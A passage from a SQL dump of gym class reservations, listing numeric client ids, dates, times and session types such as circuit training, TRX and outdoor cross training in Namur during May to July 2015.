(3877, 44, 'CTR', '2015-05-06', '17h30', '18h', 'Circuit training'),
(3865, 19, 'CTR', '2015-05-07', '17h30', '18h00', 'Core'),
(3866, 154, 'CTR', '2015-05-06', '17h30', '18h', 'Circuit training'),
(3867, 29, 'CTR', '2015-05-07', '17h30', '18h00', 'Core'),
(3868, 104, 'CTR', '2015-05-06', '18h15', '18h45', 'Force'),
(3869, 80, 'CTR', '2015-05-06', '18h15', '18h45', 'Force'),
(3870, 134, 'CTR', '2015-05-06', '17h30', '18h', 'Circuit training'),
(3871, 119, 'CTR', '2015-05-06', '18h15', '18h45', 'Force'),
(3887, 31, 'CTR', '2015-05-08', '17h30', '18h00', 'TRX'),
(3873, 162, 'CTR', '2015-05-06', '18h15', '18h45', 'Force'),
(3874, 63, 'CTR', '2015-05-06', '17h30', '18h', 'Circuit training'),
(3875, 97, 'CTR', '2015-05-06', '17h30', '18h', 'Circuit training'),
(3876, 34, 'CTR', '2015-05-06', '17h30', '18h', 'Circuit training'),
(3878, 134, 'CTR', '2015-05-07', '17h30', '18h00', 'Core'),
(3879, 155, 'CTR', '2015-05-07', '17h30', '18h00', 'Core'),
(3880, 164, 'CTR', '2015-05-07', '17h30', '18h00', 'Core'),
(3881, 165, 'CTR', '2015-05-07', '17h30', '18h00', 'Core'),
(3882, 92, 'CTR', '2015-05-07', '19h00', '19h30', 'BodyBoxe'),
(3883, 169, 'CTR', '2015-05-07', '18h15', '18h45', 'Circuit training'),
(3884, 143, 'CTR', '2015-05-07', '18h15', '18h45', 'Circuit training'),
(3885, 93, 'CTR', '2015-05-07', '18h15', '18h45', 'Circuit training'),
(3886, 105, 'CTR', '2015-05-07', '19h00', '19h30', 'BodyBoxe'),
(3888, 49, 'CTR', '2015-05-07', '18h15', '18h45', 'Circuit training'),
(3889, 48, 'CTR', '2015-05-08', '17h30', '18h00', 'TRX'),
(3890, 63, 'CTR', '2015-05-08', '17h30', '18h00', 'TRX'),
(3891, 138, 'CTR', '2015-05-11', '19h00', '19h30', 'Circuit training'),
(3892, 16, 'CTR', '2015-05-11', '17h30', '18h00', 'Circuit training'),
(3893, 48, 'CTR', '2015-05-11', '19h00', '19h30', 'Circuit training'),
(3894, 30, 'CTR', '2015-05-11', '19h00', '19h30', 'Circuit training'),
(3913, 118, 'CTR', '2015-05-13', '18h15', '18h45', 'Force'),
(3896, 140, 'CTR', '2015-05-11', '17h30', '18h00', 'Circuit training'),
(3897, 44, 'CTR', '2015-05-11', '17h30', '18h00', 'Circuit training'),
(3898, 102, 'CTR', '2015-05-11', '19h00', '19h30', 'Circuit training'),
(3910, 63, 'CTR', '2015-05-13', '17h30', '18h', 'Circuit training'),
(3911, 139, 'CTR', '2015-05-13', '17h30', '18h', 'Circuit training'),
(3903, 14, 'CTR', '2015-05-11', '17h30', '18h00', 'Circuit training'),
(3912, 119, 'CTR', '2015-05-13', '18h15', '18h45', 'Force'),
(3908, 169, 'CTR', '2015-05-12', '18h15', '18h45', 'Circuit training'),
(3909, 104, 'CTR', '2015-05-13', '18h15', '18h45', 'Force'),
(3924, 31, 'CTR', '2015-05-19', '19h45', '20h15', 'Circuit training'),
(3915, 28, 'CTR', '2015-05-20', '17h30', '18h', 'Circuit training'),
(3916, 28, 'CTR', '2015-06-01', '17h30', '18h00', 'Circuit training'),
(4051, 118, 'CTR', '2015-06-03', '18h15', '18h45', 'Force'),
(3918, 31, 'CTR', '2015-05-19', '19h00', '19h30', 'TRX'),
(3922, 48, 'CTR', '2015-05-19', '19h00', '19h30', 'TRX'),
(3923, 48, 'CTR', '2015-05-19', '19h45', '20h15', 'Circuit training'),
(3925, 169, 'CTR', '2015-05-19', '19h45', '20h15', 'Circuit training'),
(3926, 138, 'CTR', '2015-05-19', '19h45', '20h15', 'Circuit training'),
(3927, 104, 'CTR', '2015-05-20', '18h15', '18h45', 'Force'),
(3928, 93, 'CTR', '2015-05-19', '18h15', '18h45', 'Circuit training'),
(3929, 133, 'CTR', '2015-05-19', '18h15', '18h45', 'Circuit training'),
(3930, 14, 'CTR', '2015-05-21', '19h00', '19h30', 'BodyBoxe'),
(3931, 102, 'CTR', '2015-05-19', '19h45', '20h15', 'Circuit training'),
(3932, 32, 'CTR', '2015-05-19', '18h15', '18h45', 'Circuit training'),
(3933, 155, 'CTR', '2015-05-19', '19h00', '19h30', 'TRX'),
(3934, 41, 'CTR', '2015-05-19', '19h00', '19h30', 'TRX'),
(3935, 128, 'CTR', '2015-05-20', '18h15', '18h45', 'Force'),
(3936, 14, 'CTR', '2015-05-20', '18h15', '18h45', 'Force'),
(3937, 29, 'CTR', '2015-05-21', '17h30', '18h00', 'Core'),
(3938, 155, 'CTR', '2015-05-21', '17h30', '18h00', 'Core'),
(3939, 41, 'CTR', '2015-05-21', '18h15', '18h45', 'Circuit training'),
(3940, 154, 'CTR', '2015-05-20', '17h30', '18h', 'Circuit training'),
(3941, 139, 'CTR', '2015-05-20', '17h30', '18h', 'Circuit training'),
(3942, 63, 'CTR', '2015-05-20', '17h30', '18h', 'Circuit training'),
(3943, 168, 'CTR', '2015-05-21', '18h15', '18h45', 'Circuit training'),
(3944, 143, 'CTR', '2015-05-21', '18h15', '18h45', 'Circuit training'),
(3945, 56, 'CTR', '2015-05-21', '17h30', '18h00', 'Core'),
(3946, 138, 'CTR', '2015-05-21', '19h00', '19h30', 'BodyBoxe'),
(3947, 92, 'CTR', '2015-05-21', '19h00', '19h30', 'BodyBoxe'),
(3948, 103, 'CTR', '2015-05-20', '18h15', '18h45', 'Force'),
(3961, 126, 'CTR', '2015-05-21', '18h15', '18h45', 'Circuit training'),
(3950, 164, 'CTR', '2015-05-21', '17h30', '18h00', 'Core'),
(3954, 19, 'CTR', '2015-05-21', '17h30', '18h00', 'Core'),
(3952, 165, 'CTR', '2015-05-21', '17h30', '18h00', 'Core'),
(3953, 102, 'CTR', '2015-05-21', '19h00', '19h30', 'BodyBoxe'),
(3955, 104, 'CTR', '2015-05-22', '18h15', '18h45', 'Circuit training'),
(3956, 103, 'CTR', '2015-05-22', '18h15', '18h45', 'Circuit training'),
(3957, 105, 'CTR', '2015-05-21', '19h00', '19h30', 'BodyBoxe'),
(3958, 162, 'CTR', '2015-05-22', '18h15', '18h45', 'Circuit training'),
(3959, 48, 'CTR', '2015-05-22', '17h30', '18h00', 'TRX'),
(3960, 48, 'CTR', '2015-05-22', '18h15', '18h45', 'Circuit training'),
(3962, 31, 'CTR', '2015-05-22', '17h30', '18h00', 'TRX'),
(3963, 31, 'CTR', '2015-05-22', '18h15', '18h45', 'Circuit training'),
(3964, 170, 'CTR', '2015-05-22', '18h15', '18h45', 'Circuit training'),
(3965, 63, 'CTR', '2015-05-22', '17h30', '18h00', 'TRX'),
(3966, 103, 'CTR', '2015-05-27', '18h15', '18h45', 'Force'),
(3967, 104, 'CTR', '2015-05-27', '18h15', '18h45', 'Force'),
(3968, 14, 'CTR', '2015-05-27', '18h15', '18h45', 'Force'),
(3969, 128, 'CTR', '2015-05-27', '18h15', '18h45', 'Force'),
(3970, 171, 'CTR', '2015-05-27', '18h15', '18h45', 'Force'),
(3971, 54, 'CTR', '2015-05-27', '18h15', '18h45', 'Force'),
(3972, 53, 'CTR', '2015-05-27', '18h15', '18h45', 'Force'),
(3973, 138, 'CTR', '2015-05-26', '19h45', '20h15', 'Circuit training'),
(3974, 93, 'CTR', '2015-05-26', '18h15', '18h45', 'Circuit training'),
(3975, 133, 'CTR', '2015-05-26', '18h15', '18h45', 'Circuit training'),
(3976, 41, 'CTR', '2015-05-26', '19h00', '19h30', 'TRX'),
(3977, 41, 'CTR', '2015-05-27', '19h ', '19h30', 'Circuit training'),
(3978, 41, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(3979, 41, 'CTR', '2015-06-03', '19h ', '19h30', 'Circuit training'),
(3980, 41, 'CTR', '2015-06-04', '18h15', '18h45', 'Circuit training'),
(4094, 31, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(3982, 41, 'CTR', '2015-06-10', '19h ', '19h30', 'Circuit training'),
(3983, 41, 'CTR', '2015-06-11', '18h15', '18h45', 'Circuit training'),
(3984, 48, 'CTR', '2015-05-26', '19h45', '20h15', 'Circuit training'),
(3985, 44, 'CTR', '2015-05-26', '18h15', '18h45', 'Circuit training'),
(3986, 101, 'CTR', '2015-05-26', '18h15', '18h45', 'Circuit training'),
(3987, 14, 'CTR', '2015-05-28', '19h00', '19h30', 'BodyBoxe'),
(3988, 140, 'CTR', '2015-05-26', '17h30', '18h00', 'Circuit training'),
(3989, 14, 'CTR', '2015-05-26', '18h15', '18h45', 'Circuit training'),
(3990, 29, 'CTR', '2015-05-26', '17h30', '18h00', 'Circuit training'),
(3992, 158, 'CTR', '2015-05-27', '18h15', '18h45', 'Force'),
(3993, 172, 'CTR', '2015-05-27', '19h ', '19h30', 'Circuit training'),
(3994, 173, 'CTR', '2015-05-27', '19h45', '20h15', 'Réservé foot'),
(3995, 41, 'CTR', '2015-06-16', '19h00', '19h30', 'TRX'),
(3996, 44, 'CTR', '2015-05-28', '17h30', '18h00', 'Core'),
(3997, 44, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(3998, 119, 'CTR', '2015-05-27', '19h ', '19h30', 'Circuit training'),
(3999, 156, 'CTR', '2015-05-27', '19h ', '19h30', 'Circuit training'),
(4000, 156, 'CTR', '2015-05-27', '19h ', '19h30', 'Circuit training'),
(4001, 56, 'CTR', '2015-05-28', '17h30', '18h00', 'Core'),
(4002, 139, 'CTR', '2015-05-27', '17h30', '18h', 'Circuit training'),
(4003, 168, 'CTR', '2015-05-27', '19h ', '19h30', 'Circuit training'),
(4004, 63, 'CTR', '2015-05-27', '17h30', '18h', 'Circuit training'),
(4005, 29, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(4006, 93, 'CTR', '2015-05-28', '18h15', '18h45', 'Circuit training'),
(4007, 133, 'CTR', '2015-05-28', '18h15', '18h45', 'Circuit training'),
(4008, 164, 'CTR', '2015-05-28', '18h15', '18h45', 'Circuit training'),
(4009, 165, 'CTR', '2015-05-28', '18h15', '18h45', 'Circuit training'),
(4011, 155, 'CTR', '2015-05-28', '17h30', '18h00', 'Core'),
(4013, 29, 'CTR', '2015-05-28', '17h30', '18h00', 'Core'),
(4050, 154, 'CTR', '2015-06-03', '17h30', '18h', 'Circuit training'),
(4016, 104, 'CTR', '2015-06-03', '18h15', '18h45', 'Force'),
(4052, 103, 'CTR', '2015-06-03', '19h ', '19h30', 'Circuit training'),
(4018, 119, 'CTR', '2015-06-03', '18h15', '18h45', 'Force'),
(4019, 171, 'CTR', '2015-06-03', '18h15', '18h45', 'Force'),
(4043, 173, 'CTR', '2015-06-03', '17h30', '18h', 'Circuit training'),
(4021, 14, 'CTR', '2015-06-03', '18h15', '18h45', 'Force'),
(4022, 128, 'CTR', '2015-06-03', '18h15', '18h45', 'Force'),
(4023, 26, 'CTR', '2015-06-03', '19h ', '19h30', 'Circuit training'),
(4024, 130, 'CTR', '2015-06-03', '19h ', '19h30', 'Circuit training'),
(4025, 168, 'CTR', '2015-06-03', '19h ', '19h30', 'Circuit training'),
(4026, 14, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(4027, 80, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(4030, 158, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(4031, 31, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(4032, 48, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(4033, 48, 'CTR', '2015-06-01', '19h00', '19h30', 'Circuit training'),
(4034, 155, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(4035, 32, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(4036, 41, 'CTR', '2015-06-17', '19h ', '19h30', 'Circuit training'),
(4037, 41, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(4038, 130, 'CTR', '2015-06-01', '19h00', '19h30', 'Circuit training'),
(4039, 26, 'CTR', '2015-06-01', '19h00', '19h30', 'Circuit training'),
(4040, 168, 'CTR', '2015-06-01', '17h30', '18h00', 'Circuit training'),
(4041, 14, 'CTR', '2015-06-01', '17h30', '18h00', 'Circuit training'),
(4071, 93, 'CTR', '2015-06-04', '18h15', '18h45', 'Circuit training'),
(4044, 63, 'CTR', '2015-06-03', '17h30', '18h', 'Circuit training'),
(4049, 139, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(4046, 121, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(4047, 138, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(4048, 92, 'CTR', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur'),
(4053, 44, 'CTR', '2015-06-04', '17h30', '18h00', 'Core'),
(4054, 44, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(4055, 130, 'CTR', '2015-06-10', '19h ', '19h30', 'Circuit training'),
(4056, 26, 'CTR', '2015-06-10', '19h ', '19h30', 'Circuit training'),
(4057, 168, 'CTR', '2015-06-10', '19h ', '19h30', 'Circuit training'),
(4110, 130, 'CTR', '2015-06-17', '19h ', '19h30', 'Circuit training'),
(4059, 128, 'CTR', '2015-06-10', '18h15', '18h45', 'Force'),
(4061, 14, 'CTR', '2015-06-10', '18h15', '18h45', 'Force'),
(4062, 103, 'CTR', '2015-06-10', '18h15', '18h45', 'Force'),
(4063, 118, 'CTR', '2015-06-10', '18h15', '18h45', 'Force'),
(4064, 104, 'CTR', '2015-06-10', '18h15', '18h45', 'Force');
INSERT INTO `reservation_reservation_bck` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(4065, 171, 'CTR', '2015-06-10', '18h15', '18h45', 'Force'),
(4066, 80, 'CTR', '2015-06-10', '19h45', '20h15', 'Réservé foot'),
(4067, 173, 'CTR', '2015-06-10', '19h45', '20h15', 'Réservé foot'),
(4068, 154, 'CTR', '2015-06-10', '17h30', '18h', 'Circuit training'),
(4069, 4, 'CTR', '2015-06-10', '17h30', '18h', 'Circuit training'),
(4072, 133, 'CTR', '2015-06-04', '18h15', '18h45', 'Circuit training'),
(4079, 132, 'CTR', '2015-06-10', '19h ', '19h30', 'Circuit training'),
(4074, 165, 'CTR', '2015-06-04', '18h15', '18h45', 'Circuit training'),
(4075, 164, 'CTR', '2015-06-04', '18h15', '18h45', 'Circuit training'),
(4076, 29, 'CTR', '2015-06-04', '17h30', '18h00', 'Core'),
(4077, 105, 'CTR', '2015-06-04', '18h15', '18h45', 'Circuit training'),
(4081, 113, 'CTR', '2015-06-10', '19h ', '19h30', 'Circuit training'),
(4082, 170, 'CTR', '2015-06-10', '18h15', '18h45', 'Force'),
(4083, 44, 'CTR', '2015-06-08', '17h30', '18h00', 'Circuit training'),
(4084, 48, 'CTR', '2015-06-08', '19h00', '19h30', 'Circuit training'),
(4085, 140, 'CTR', '2015-06-08', '17h30', '18h00', 'Circuit training'),
(4086, 143, 'CTR', '2015-06-08', '17h30', '18h00', 'Circuit training'),
(4087, 14, 'CTR', '2015-06-08', '17h30', '18h00', 'Circuit training'),
(4088, 32, 'CTR', '2015-06-08', '19h00', '19h30', 'Circuit training'),
(4089, 138, 'CTR', '2015-06-08', '19h00', '19h30', 'Circuit training'),
(4111, 168, 'CTR', '2015-06-17', '19h ', '19h30', 'Circuit training'),
(4093, 126, 'CTR', '2015-06-10', '19h ', '19h30', 'Circuit training'),
(4095, 63, 'CTR', '2015-06-10', '17h30', '18h', 'Circuit training'),
(4097, 41, 'CTR', '2015-06-23', '19h00', '19h30', 'TRX'),
(4098, 41, 'CTR', '2015-06-24', '19h ', '19h30', 'Circuit training'),
(4100, 41, 'CTR', '2015-06-25', '18h15', '18h45', 'Circuit training'),
(4207, 175, 'CTR', '2015-07-01', '17h30', '18h', 'Circuit training'),
(4102, 41, 'CTR', '2015-07-01', '19h ', '19h30', 'Circuit training'),
(4103, 29, 'CTR', '2015-06-11', '17h30', '18h00', 'Core'),
(4104, 143, 'CTR', '2015-06-11', '18h15', '18h45', 'Circuit training'),
(4105, 164, 'CTR', '2015-06-11', '19h00', '19h30', 'BodyBoxe'),
(4106, 165, 'CTR', '2015-06-11', '19h00', '19h30', 'BodyBoxe'),
(4107, 105, 'CTR', '2015-06-11', '19h00', '19h30', 'BodyBoxe'),
(4108, 32, 'CTR', '2015-06-11', '18h15', '18h45', 'Circuit training'),
(4109, 44, 'CTR', '2015-06-11', '17h30', '18h00', 'Core'),
(4112, 103, 'CTR', '2015-06-17', '18h15', '18h45', 'Force'),
(4113, 104, 'CTR', '2015-06-17', '18h15', '18h45', 'Force'),
(4114, 14, 'CTR', '2015-06-17', '18h15', '18h45', 'Force'),
(4115, 128, 'CTR', '2015-06-17', '18h15', '18h45', 'Force'),
(4116, 171, 'CTR', '2015-06-17', '18h15', '18h45', 'Force'),
(4117, 119, 'CTR', '2015-06-17', '18h15', '18h45', 'Force'),
(4118, 155, 'CTR', '2015-06-11', '17h30', '18h00', 'Core'),
(4119, 48, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(4120, 44, 'CTR', '2015-06-15', '17h30', '18h00', 'Circuit training'),
(4121, 155, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(4122, 42, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(4123, 77, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(4124, 48, 'CTR', '2015-06-15', '19h00', '19h30', 'Circuit training'),
(4125, 143, 'CTR', '2015-06-15', '19h00', '19h30', 'Circuit training'),
(4126, 31, 'CTR', '2015-06-16', '19h45', '20h15', 'Circuit training'),
(4127, 32, 'CTR', '2015-06-15', '19h00', '19h30', 'Circuit training'),
(4128, 169, 'CTR', '2015-06-16', '18h15', '18h45', 'Circuit training'),
(4136, 139, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(4130, 93, 'CTR', '2015-06-16', '18h15', '18h45', 'Circuit training'),
(4131, 133, 'CTR', '2015-06-16', '18h15', '18h45', 'Circuit training'),
(4132, 48, 'CTR', '2015-06-16', '19h45', '20h15', 'Circuit training'),
(4133, 100, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(4134, 100, 'CTR', '2015-06-16', '19h45', '20h15', 'Circuit training'),
(4135, 32, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(4137, 164, 'CTR', '2015-06-17', '19h ', '19h30', 'Circuit training'),
(4138, 154, 'CTR', '2015-06-17', '17h30', '18h', 'Circuit training'),
(4139, 53, 'CTR', '2015-06-17', '18h15', '18h45', 'Force'),
(4140, 54, 'CTR', '2015-06-17', '18h15', '18h45', 'Force'),
(4141, 69, 'CTR', '2015-06-17', '18h15', '18h45', 'Force'),
(4142, 132, 'CTR', '2015-06-22', '19h00', '19h30', 'Circuit training'),
(4143, 29, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(4144, 105, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(4145, 53, 'CTR', '2015-06-24', '18h15', '18h45', 'Force'),
(4146, 14, 'CTR', '2015-06-24', '18h15', '18h45', 'Force'),
(4147, 69, 'CTR', '2015-06-24', '18h15', '18h45', 'Force'),
(4148, 118, 'CTR', '2015-06-24', '18h15', '18h45', 'Force'),
(4149, 103, 'CTR', '2015-06-24', '18h15', '18h45', 'Force'),
(4150, 128, 'CTR', '2015-06-24', '18h15', '18h45', 'Force'),
(4151, 104, 'CTR', '2015-06-24', '18h15', '18h45', 'Force'),
(4197, 101, 'CTR', '2015-06-27', '10h30', '11h30', 'Cross Training OUTDOOR interval training course + renforcement musculaire'),
(4153, 54, 'CTR', '2015-06-24', '18h15', '18h45', 'Force'),
(4154, 119, 'CTR', '2015-06-24', '18h15', '18h45', 'Force'),
(4155, 130, 'CTR', '2015-06-24', '19h ', '19h30', 'Circuit training'),
(4156, 90, 'CTR', '2015-06-24', '19h ', '19h30', 'Circuit training'),
(4168, 113, 'CTR', '2015-06-24', '19h ', '19h30', 'Circuit training'),
(4158, 26, 'CTR', '2015-06-24', '19h ', '19h30', 'Circuit training'),
(4191, 126, 'CTR', '2015-06-24', '17h30', '18h', 'Circuit training'),
(4160, 53, 'CTR', '2015-06-19', '17h30', '18h00', 'TRX'),
(4161, 140, 'CTR', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur '),
(4162, 31, 'CTR', '2015-06-19', '17h30', '18h00', 'TRX'),
(4163, 48, 'CTR', '2015-06-19', '17h30', '18h00', 'TRX'),
(4164, 47, 'CTR', '2015-06-19', '17h30', '18h00', 'TRX'),
(4165, 69, 'CTR', '2015-06-19', '17h30', '18h00', 'TRX'),
(4166, 31, 'CTR', '2015-06-23', '19h45', '20h15', 'Circuit training'),
(4167, 26, 'CTR', '2015-06-23', '19h00', '19h30', 'TRX'),
(4177, 31, 'CTR', '2015-06-27', '10h30', '11h30', 'Cross Training OUTDOOR Renforcement musculaire'),
(4170, 169, 'CTR', '2015-06-23', '18h15', '18h45', 'Circuit training'),
(4171, 100, 'CTR', '2015-06-23', '19h00', '19h30', 'TRX'),
(4176, 44, 'CTR', '2015-06-22', '19h00', '19h30', 'Circuit training'),
(4173, 56, 'CTR', '2015-06-27', '10h30', '11h30', 'Cross Training OUTDOOR interval training course + renforcement musculaire'),
(4174, 32, 'CTR', '2015-06-22', '19h00', '19h30', 'Circuit training'),
(4183, 44, 'CTR', '2015-06-24', '17h30', '18h', 'Circuit training'),
(4178, 48, 'CTR', '2015-06-23', '19h45', '20h15', 'Circuit training'),
(4179, 48, 'CTR', '2015-06-27', '10h30', '11h30', 'Cross Training OUTDOOR Renforcement musculaire'),
(4180, 164, 'CTR', '2015-06-24', '19h ', '19h30', 'Circuit training'),
(4181, 165, 'CTR', '2015-06-24', '19h ', '19h30', 'Circuit training'),
(4182, 175, 'CTR', '2015-06-24', '17h30', '18h', 'Circuit training'),
(4184, 14, 'CTR', '2015-06-25', '19h00', '19h30', 'BodyBoxe'),
(4185, 14, 'CTR', '2015-06-23', '17h30', '18h00', 'Circuit training'),
(4186, 140, 'CTR', '2015-06-23', '17h30', '18h00', 'Circuit training'),
(4187, 130, 'CTR', '2015-06-23', '19h00', '19h30', 'TRX'),
(4188, 176, 'CTR', '2015-06-23', '17h30', '18h00', 'Circuit training'),
(4190, 154, 'CTR', '2015-06-24', '17h30', '18h', 'Circuit training'),
(4192, 173, 'CTR', '2015-06-24', '17h30', '18h', 'Circuit training'),
(4193, 4, 'CTR', '2015-06-24', '17h30', '18h', 'Circuit training'),
(4194, 132, 'CTR', '2015-06-29', '19h00', '19h30', 'Circuit training'),
(4195, 139, 'CTR', '2015-06-24', '17h30', '18h', 'Circuit training'),
(4196, 30, 'CTR', '2015-06-24', '19h ', '19h30', 'Circuit training'),
(4198, 41, 'CTR', '2015-07-06', '19h00', '19h30', 'Circuit training'),
(4199, 41, 'CTR', '2015-07-08', '19h ', '19h30', 'Circuit training'),
(4298, 41, 'CTR', '2015-07-27', '19h00', '19h30', 'Circuit training'),
(4201, 41, 'CTR', '2015-07-15', '19h ', '19h30', 'Circuit training'),
(4202, 93, 'CTR', '2015-06-25', '18h15', '18h45', 'Circuit training'),
(4203, 143, 'CTR', '2015-06-25', '18h15', '18h45', 'Circuit training'),
(4204, 30, 'CTR', '2015-07-01', '19h ', '19h30', 'Circuit training'),
(4205, 105, 'CTR', '2015-06-25', '19h00', '19h30', 'BodyBoxe'),
(4206, 4, 'CTR', '2015-06-25', '18h15', '18h45', 'Circuit training'),
(4208, 103, 'CTR', '2015-07-01', '18h15', '18h45', 'Force'),
(4209, 69, 'CTR', '2015-07-01', '18h15', '18h45', 'Force'),
(4210, 53, 'CTR', '2015-07-01', '18h15', '18h45', 'Force'),
(4211, 118, 'CTR', '2015-07-01', '18h15', '18h45', 'Force'),
(4212, 119, 'CTR', '2015-07-01', '18h15', '18h45', 'Force'),
(4213, 14, 'CTR', '2015-07-01', '18h15', '18h45', 'Force'),
(4214, 128, 'CTR', '2015-07-01', '18h15', '18h45', 'Force'),
(4215, 54, 'CTR', '2015-07-01', '18h15', '18h45', 'Force'),
(4216, 26, 'CTR', '2015-07-01', '19h ', '19h30', 'Circuit training'),
(4217, 130, 'CTR', '2015-07-01', '19h ', '19h30', 'Circuit training'),
(4218, 164, 'CTR', '2015-07-01', '19h ', '19h30', 'Circuit training'),
(4219, 165, 'CTR', '2015-07-01', '19h ', '19h30', 'Circuit training'),
(4220, 57, 'CTR', '2015-07-01', '19h ', '19h30', 'Circuit training'),
(4221, 32, 'CTR', '2015-06-27', '10h30', '11h30', 'Cross Training OUTDOOR interval training course + renforcement musculaire'),
(4222, 100, 'CTR', '2015-07-01', '19h ', '19h30', 'Circuit training'),
(4237, 140, 'CTR', '2015-07-08', '17h30', '18h', 'Circuit training'),
(4238, 44, 'CTR', '2015-07-01', '17h30', '18h', 'Circuit training'),
(4225, 44, 'CTR', '2015-06-29', '17h30', '18h00', 'Circuit training'),
(4226, 31, 'CTR', '2015-06-29', '18h15', '18h45', 'Circuit training'),
(4227, 31, 'CTR', '2015-06-29', '19h00', '19h30', 'Circuit training'),
(4228, 48, 'CTR', '2015-06-29', '18h15', '18h45', 'Circuit training'),
(4229, 48, 'CTR', '2015-06-29', '19h00', '19h30', 'Circuit training'),
(4230, 56, 'CTR', '2015-06-29', '18h15', '18h45', 'Circuit training'),
(4231, 26, 'CTR', '2015-06-29', '18h15', '18h45', 'Circuit training'),
(4232, 121, 'CTR', '2015-06-29', '18h15', '18h45', 'Circuit training'),
(4233, 32, 'CTR', '2015-06-29', '19h00', '19h30', 'Circuit training'),
(4234, 104, 'CTR', '2015-07-08', '18h15', '18h45', 'Force'),
(4236, 169, 'CTR', '2015-07-06', '17h30', '18h00', 'Circuit training'),
(4267, 80, 'CTR', '2015-07-08', '19h ', '19h30', 'Circuit training'),
(4266, 130, 'CTR', '2015-07-06', '18h15', '18h45', 'Circuit training'),
(4301, 177, 'CTR', '2015-07-13', '18h15', '18h45', 'Circuit training'),
(4242, 41, 'CTR', '2015-07-22', '19h ', '19h30', 'Circuit training'),
(4243, 56, 'CTR', '2015-07-01', '17h30', '18h', 'Circuit training'),
(4244, 80, 'CTR', '2015-07-01', '18h15', '18h45', 'Force'),
(4245, 48, 'CTR', '2015-07-01', '17h30', '18h', 'Circuit training'),
(4247, 100, 'CTR', '2015-07-22', '19h ', '19h30', 'Circuit training'),
(4248, 29, 'CTR', '2015-07-06', '17h30', '18h00', 'Circuit training'),
(4249, 175, 'CTR', '2015-07-06', '17h30', '18h00', 'Circuit training'),
(4268, 175, 'CTR', '2015-07-08', '19h ', '19h30', 'Circuit training'),
(4251, 103, 'CTR', '2015-07-08', '18h15', '18h45', 'Force'),
(4276, 155, 'CTR', '2015-07-09', '18h30', '19h30', 'Cross Training OUTDOOR (ravel saint-servais)'),
(4253, 119, 'CTR', '2015-07-08', '18h15', '18h45', 'Force'),
(4311, 32, 'CTR', '2015-07-13', '19h00', '19h30', 'Circuit training'),
(4255, 128, 'CTR', '2015-07-08', '18h15', '18h45', 'Force'),
(4256, 14, 'CTR', '2015-07-08', '18h15', '18h45', 'Force'),
(4257, 177, 'CTR', '2015-07-08', '18h15', '18h45', 'Force'),
(4258, 130, 'CTR', '2015-07-08', '19h ', '19h30', 'Circuit training'),
(4259, 30, 'CTR', '2015-07-15', '19h ', '19h30', 'Circuit training'),
(4275, 173, 'CTR', '2015-07-08', '17h30', '18h', 'Circuit training'),
(4261, 178, 'CTR', '2015-07-08', '19h ', '19h30', 'Circuit training'),
(4262, 132, 'CTR', '2015-07-06', '19h00', '19h30', 'Circuit training'),
(4263, 57, 'CTR', '2015-07-06', '18h15', '18h45', 'Circuit training'),
(4264, 26, 'CTR', '2015-07-06', '18h15', '18h45', 'Circuit training'),
(4269, 4, 'CTR', '2015-07-08', '17h30', '18h', 'Circuit training'),
(4270, 80, 'CTR', '2015-07-08', '17h30', '18h', 'Circuit training'),
(4271, 132, 'CTR', '2015-07-08', '19h ', '19h30', 'Circuit training'),
(4272, 132, 'CTR', '2015-07-13', '19h00', '19h30', 'Circuit training'),
(4273, 41, 'CTR', '2015-07-09', '18h30', '19h30', 'Cross Training OUTDOOR (ravel saint-servais)'),
(4274, 48, 'CTR', '2015-07-08', '17h30', '18h', 'Circuit training'),
(4277, 77, 'CTR', '2015-07-09', '18h30', '19h30', 'Cross Training OUTDOOR (ravel saint-servais)'),
(4278, 155, 'CTR', '2015-07-08', '19h ', '19h30', 'Circuit training'),
(4279, 29, 'CTR', '2015-07-08', '17h30', '18h', 'Circuit training'),
(4281, 175, 'CTR', '2015-07-15', '17h30', '18h', 'Circuit training'),
